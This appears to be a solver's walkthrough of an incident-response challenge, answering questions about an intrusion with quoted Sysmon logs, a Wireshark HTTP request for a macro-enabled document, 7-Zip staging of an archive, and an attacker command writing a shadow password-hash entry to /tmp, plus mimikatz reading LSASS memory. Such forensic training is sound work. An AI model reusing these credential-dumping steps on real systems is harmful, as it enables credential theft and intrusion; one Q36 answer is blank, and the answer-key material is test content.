echo "sysadmin:$y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5:20276:0:99999:7::" > shdw.txt

File created: shdw.txt
Location: /tmp/shdw.txt
Full command: echo "sysadmin:$y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5:20276:0:99999:7::" > shdw.txt

Answer:

shdw.txt

Q32

What type of information did the attacker save in the text file in the "/tmp" directory on WEB-APP01?

base64-encoded command

Password hash entry

Group membership information

Command Execution History

Username: sysadmin
Hash: $y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5
- $y$ = yescrypt algorithm (modern Linux hashing)
- Contains salt and hashed password
20276: Days since epoch when password was last changed
0:99999:7: Password aging parameters

Answer:

Password hash entry

Q33

What is the full filename of the executable the attacker used to perform OS Credential Dumping on WKS-RSCH01 after elevating privileges? Answer Format: Provide the name of the executable exactly as it appears in the logs, including the extension. For example: tool.exe

Sysmon Event ID 10 (Process Access) - July 14, 2025 @ 00:25:28

SourceImage: C:\Users\Public\mimikatz.exe
TargetImage: C:\Windows\system32\lsass.exe
SourceUser: NT AUTHORITY\SYSTEM
GrantedAccess: 0x1010
RuleName: technique_id=T1003,technique_name=Credential Dumping

Key Details:

Executable: mimikatz.exe
Location: C:\Users\Public\mimikatz.exe
Target Process: lsass.exe (Local Security Authority Subsystem Service)
Access Rights: 0x1010 (PROCESS_VM_READ - read memory permissions)
User Context: NT AUTHORITY\SYSTEM (elevated privileges)
Timestamp: 00:25:27 (after privilege escalation at 00:14:09)
MITRE ATT&CK: T1003.001 (LSASS Memory credential dumping)

Attack Flow:

00:14:09 - Named pipe privilege escalation to SYSTEM
00:25:27 - mimikatz.exe accessed lsass.exe to dump credentials
01:06:04 - Persistent service created (p3rsist.exe)

Answer:

mimikatz.exe

Q34

Based on network traffic correlation, what was the exact date and time the Word document was downloaded on WKS-RSCH01? Answer Format: Use the format MM-DD-YYYY-HH:MM:SS (e.g., 07-18-2025-09:14:22).


C:\Users\Administrator\Desktop\Evidence\PCAPs>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop\Evidence\PCAPs

07/17/2025  05:47 PM    <DIR>          .
07/17/2025  05:47 PM    <DIR>          ..
07/14/2025  02:02 AM         9,096,900 FILE-SRV01.pcapng
07/14/2025  01:31 AM        13,510,860 RSCH-WKS01-2.pcapng
07/14/2025  12:00 AM         5,735,356 RSCH-WKS01.pcapng
               3 File(s)     28,343,116 bytes
               2 Dir(s)  36,553,654,272 bytes free

load to wireshark

C:\Users\Administrator\Desktop\Evidence\PCAPs\RSCH-WKS01.pcapng

use this filter:

http and http.request.method==GET

Jul 13, 2025 23:49:49.012957000 Coordinated Universal Time

GET /AetherGen_SARS-CoV-3_Response_Plan.docm HTTP/1.1
Host: 18.212.186.186
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://18.212.186.186/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9


HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.13.3
Date: Sun, 13 Jul 2025 23:49:48 GMT
Content-type: application/vnd.ms-word.document.macroEnabled.12
Content-Length: 108782
Last-Modified: Sun, 13 Jul 2025 23:41:45 GMT

Answer:

07-13-2025-23:49:49

Q35

What is the name of the compressed archive the attacker created for purposes of data exfiltration on WKS-RSCH01? Answer Format: Provide the name of the archive exactly as it appears in the logs, including the extension

Evidence from Sysmon Logs:

File Creation Event - July 14, 2025 @ 01:13:33.043 UTC

Event ID: 11 (File Created)
Image: C:\Users\Public\7z.exe
TargetFilename: C:\Users\Public\ad.7z
CreationUtcTime: 2025-07-14 01:13:33.043
User: NT AUTHORITY\SYSTEM
ProcessId: 4168

Temporary file also created at 01:14:19.456:

TargetFilename: C:\Users\Public\ad.7z.tmp

Key Details:

Archive Name: ad.7z (likely "Active Directory" data)
Compression Tool: 7-Zip (7z.exe)
Location: C:\Users\Public\ad.7z
User Context: NT AUTHORITY\SYSTEM (elevated privileges)
Purpose: Data exfiltration preparation
MITRE ATT&CK: T1105 (Ingress Tool Transfer) - though this is actually collection/staging
Timeline: Created after persistent service installation (01:06:04) and before end of incident

Attack Flow:

01:06:04 - Persistent service created (p3rsist.exe)
01:13:33 - Archive created: ad.7z (data collection/staging)
01:14:19 - Temporary file ad.7z.tmp created (7z compression in progress)
Prepared for exfiltration via FTP server on WEB-APP01

Answer:

ad.7z

Q36

On WKS-RSCH01, the attacker enumerated Organizational Units (OUs) and groups to identify AD group memberships. They then saved the results into separate text files, with one file created per group. Based on the KAPE evidence, how many text files did the attacker create for the enumerated groups?

cd C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE\RSCH-WKS01\KAPE



C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE\RSCH-WKS01\KAPE>findstr /i "Public" 2025-07-17T21_29_58_7761996_ConsoleLog.txt
[2025-07-17 21:29:59.1517939 | INF] Command line:   --tsource C: --tdest C:\Users\mhardy\Desktop\WKS-RSCH01\KAPE --target AppDataRecursive,UsersPublic,!BasicCollection,!SANS_Triage,OfficeDocumentCache,ScheduledTasks,StartupFolders,StartupInfo --zip WKS-RSCH01 --gui

C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE\RSCH-WKS01\KAPE>findstr /i "group" 2025-07-17T21_29_58_7761996_ConsoleLog.txt
[2025-07-17 21:30:24.3075028 | INF]   Deferring C:\Windows\System32\winevt\logs\Microsoft-Windows-GroupPolicy%4Operational.evtx due to IOException...
[2025-07-17 21:30:24.3235035 | INF]   Deferring C:\Windows\System32\winevt\logs\Microsoft-Windows-HomeGroup Control Panel%4Operational.evtx due to IOException...
[2025-07-17 21:30:39.1825630 | INF]   Copied deferred file C:\Windows\System32\winevt\logs\Microsoft-Windows-GroupPolicy%4Operational.evtx to C:\Users\mhardy\Desktop\WKS-RSCH01\KAPE\C\Windows\System32\winevt\logs\Microsoft-Windows-GroupPolicy%4Operational.evtx. Hashing source file...
[2025-07-17 21:30:39.1981770 | INF]   Copied deferred file C:\Windows\System32\winevt\logs\Microsoft-Windows-HomeGroup Control Panel%4Operational.evtx to C:\Users\mhardy\Desktop\WKS-RSCH01\KAPE\C\Windows\System32\winevt\logs\Microsoft-Windows-HomeGroup Control Panel%4Operational.evtx. Hashing source file...

Search for file creation in Public folder:

agent.name:"WKS-RSCH01" AND data.win.system.eventID:"11" AND data.win.eventdata.targetFilename:*Public*

ad.7z (archive)
7z.exe (compression tool)
PowerView.ps1 (AD enumeration tool)
mimikatz.exe (credential dumper)
AdFind.exe (AD enumeration tool)
dochelp.exe (initial payload)

Answer:

Q37

What is the full filename of the document downloaded onto WKS-RSCH01? _Answer Format: Provide the filename including extension as it appears in the logs._For example: document.docx*

PS C:\Users\Administrator\Desktop\Evidence\PCAPs\e> dir


    Directory: C:\Users\Administrator\Desktop\Evidence\PCAPs\e


Mode                LastWriteTime         Length Name
-                -          -
-a-        12/4/2025   7:46 AM            337 %5c
-a-        12/4/2025   7:46 AM         108782 AetherGen_SARS-CoV-3_Response_Plan.docm
-a-        12/4/2025   7:46 AM           7168 dochelp.exe
-a-        12/4/2025   7:46 AM            335 favicon.ico
-a-        12/4/2025   7:46 AM            339 security-credentials
-a-        12/4/2025   7:46 AM            387 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh
-a-        12/4/2025   7:46 AM            397 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(1)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(10)
-a-        12/4/2025   7:46 AM            288 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(100)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(101)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(102)
-a-        12/4/2025   7:46 AM            544 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(103)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(104)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(105)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(106)
-a-        12/4/2025   7:46 AM            480 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(107)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(108)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(109)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(11)
-a-        12/4/2025   7:46 AM            624 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(110)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(111)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(112)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(113)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(114)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(115)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(116)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(117)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(118)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(119)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(12)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(120)
-a-        12/4/2025   7:46 AM            288 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(121)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(122)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(123)
-a-        12/4/2025   7:46 AM            304 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(124)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(125)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(126)
-a-        12/4/2025   7:46 AM            304 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(127)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(128)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(129)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(13)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(130)
-a-        12/4/2025   7:46 AM            256 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(131)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(132)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(133)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(134)
-a-        12/4/2025   7:46 AM            608 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(135)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(136)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(137)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(138)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(139)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(14)
-a-        12/4/2025   7:46 AM            608 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(140)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(141)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(142)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(143)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(144)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(145)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(146)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(147)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(148)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(149)
-a-        12/4/2025   7:46 AM            272 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(15)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(150)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(151)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(152)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(153)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(154)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(155)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(156)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(157)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(158)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(159)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(16)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(160)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(161)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(162)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(163)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(164)
-a-        12/4/2025   7:46 AM        2198160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(165)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(166)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(167)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(168)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(169)
-a-        12/4/2025   7:46 AM            576 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(17)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(170)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(171)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(172)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(173)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(174)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(175)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(176)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(177)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(178)
-a-        12/4/2025   7:46 AM            272 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(179)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(18)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(180)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(181)
-a-        12/4/2025   7:46 AM            816 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(182)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(183)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(184)
-a-        12/4/2025   7:46 AM            224 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(185)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(186)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(187)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(188)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(189)
-a-        12/4/2025   7:46 AM           1872 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(19)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(190)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(191)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(192)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(193)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(2)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(20)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(21)
-a-        12/4/2025   7:46 AM          72688 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(22)
-a-        12/4/2025   7:46 AM            224 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(23)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(24)
-a-        12/4/2025   7:46 AM            272 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(25)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(26)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(27)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(28)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(29)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(3)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(30)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(31)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(32)
-a-        12/4/2025   7:46 AM            304 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(33)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(34)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(35)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(36)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(37)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(38)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(39)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(4)
-a-        12/4/2025   7:46 AM            288 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(40)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(41)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(42)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(43)
-a-        12/4/2025   7:46 AM            256 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(44)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(45)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(46)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(47)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(48)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(49)
-a-        12/4/2025   7:46 AM            512 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(5)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(50)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(51)
-a-        12/4/2025   7:46 AM            784 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(52)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(53)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(54)
-a-        12/4/2025   7:46 AM            432 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(55)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(56)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(57)
-a-        12/4/2025   7:46 AM            912 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(58)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(59)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(6)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(60)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(61)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(62)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(63)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(64)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(65)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(66)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(67)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(68)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(69)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(7)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(70)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(71)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(72)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(73)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(74)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(75)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(76)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(77)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(78)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(79)
-a-        12/4/2025   7:46 AM         190480 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(8)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(80)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(81)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(82)
-a-        12/4/2025   7:46 AM            896 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(83)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(84)
